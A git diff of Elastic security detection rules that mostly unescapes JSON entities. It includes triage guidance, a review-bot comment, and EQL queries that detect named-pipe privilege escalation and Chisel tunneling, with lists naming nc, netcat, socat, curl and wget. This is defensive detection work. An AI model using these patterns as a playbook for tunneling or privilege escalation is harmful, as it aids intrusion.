introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with 
Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n",
 "references": [
 "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation",
 "https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/",
@@ -55,7 +55,7 @@
 ],
 "risk_score": 73,
 "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
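Review bot: `process.pe.original_file_name in ("Cmd.Exe", "PowerShell.EXE")` on the new side is a case-sensitive `in` against two exact Windows PowerShell / cmd PE names, so a PowerShell 7 host (`pwsh.exe`, which I believe carries a different original file name — verify on an endpoint) or any other interpreter that can `echo` into a pipe is outside the rule. Switching to the case-insensitive `in~` and adding the pwsh PE name once confirmed would close that without widening false positives, since the remaining `echo` + `>` + `\\.\pipe\` conditions still have to hold. This is pre-existing in the rule; the commit only unescapes `\u003e` in the query and `\u003c` in the setup text.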
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_104.json b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_104.json
index 057d3b33bff..5c57b76aacb 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_104.json
@@ -91,7 +91,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_105.json b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_105.json
index 264a532f2ed..e9cd9923d3d 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_105.json
@@ -90,7 +90,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_106.json b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_106.json
index 71cacc53d8d..45c7086f6db 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_106.json
@@ -90,7 +90,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_207.json b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_207.json
index d258d3815a6..d1b42bfa9d8 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_207.json
@@ -90,7 +90,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_101.json b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_101.json
index 4a6342ae82d..e4cebf18544 100644
--- a/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_101.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_102.json b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_102.json
index 80b33db6d25..c45b6fb33f8 100644
--- a/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_102.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_101.json b/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_101.json
index acccee96f1f..33637ec0b82 100644
--- a/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_101.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -68,7 +68,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_102.json b/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_102.json
index 83cab64b497..a2bd70a57a8 100644
--- a/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_102.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -66,7 +66,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_1.json b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_1.json
index 08a6e3b94af..03b06445fb6 100644
--- a/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_1.json
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Protocol Tunneling via Chisel Client",
- "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"client\" and process.args : (\"R*\", \"*:*\", \"*socks*\", \"*.*\") and process.args_count \u003e= 4 and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\")]\n",
+ "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"client\" and process.args : (\"R*\", \"*:*\", \"*socks*\", \"*.*\") and process.args_count >= 4 and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\")]\n",
 "references": [
"https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_2.json b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_2.json index b97d8a659aa..4322e0ef65b 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_2.json 
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Protocol Tunneling via Chisel Client",
- "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"client\" and process.args : (\"R*\", \"*:*\", \"*socks*\", \"*.*\") and process.args_count \u003e= 4 and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\")]\n",
+ "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"client\" and process.args : (\"R*\", \"*:*\", \"*socks*\", \"*.*\") and process.args_count >= 4 and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\")]\n",
 "references": [
"https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_3.json b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_3.json index fc2458c9db7..f2d85666983 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_3.json 
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Protocol Tunneling via Chisel Client",
- "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"client\" and process.args : (\"R*\", \"*:*\", \"*socks*\", \"*.*\") and process.args_count \u003e= 4 and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\")]\n",
+ "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"client\" and process.args : (\"R*\", \"*:*\", \"*socks*\", \"*.*\") and process.args_count >= 4 and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\")]\n",
 "references": [
"https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_104.json index 436931f2f49..7c1d27ec996 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_104.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_105.json index 20b55cf21f1..e25645782f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_106.json index 2506531314a..1a3a6b35862 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_106.json 
+++ b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_106.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_107.json b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_107.json
index e1520c8aaed..306d0b43154 100644
--- a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_107.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_108.json b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_108.json
index 718e3dcdb69..84e308c44d4 100644
--- a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_108.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_1.json b/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_1.json
index 66cd2b18969..e5dd6f0ee53 100644
--- a/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_1.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_2.json b/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_2.json
index 66e33e75630..8632bbd4483 100644
--- a/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_2.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/3f4e2dba-828a-452a-af35-fe29c5e78969_1.json b/packages/security_detection_engine/kibana/security_rule/3f4e2dba-828a-452a-af35-fe29c5e78969_1.json
index 1f2e5d3f08a..506103dbb7e 100644
--- a/packages/security_detection_engine/kibana/security_rule/3f4e2dba-828a-452a-af35-fe29c5e78969_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/3f4e2dba-828a-452a-af35-fe29c5e78969_1.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_1.json b/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_1.json
index f5a908e127b..b52e7765e44 100644
--- a/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_1.json
@@ -36,7 +36,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_102.json b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_102.json
index 3394364c3b2..56747771e5b 100644
--- a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_102.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_103.json b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_103.json
index 485c4d300cc..7f005779339 100644
--- a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_103.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_104.json b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_104.json
index 37c6b3db835..e78c60dec57 100644
--- a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_104.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_105.json b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_105.json
index 0e9da1878b6..dfb11c8f317 100644
--- a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_105.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_1.json b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_1.json
index 3f1890c9552..73989e296af 100644
--- a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_1.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Modprobe File Event", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. 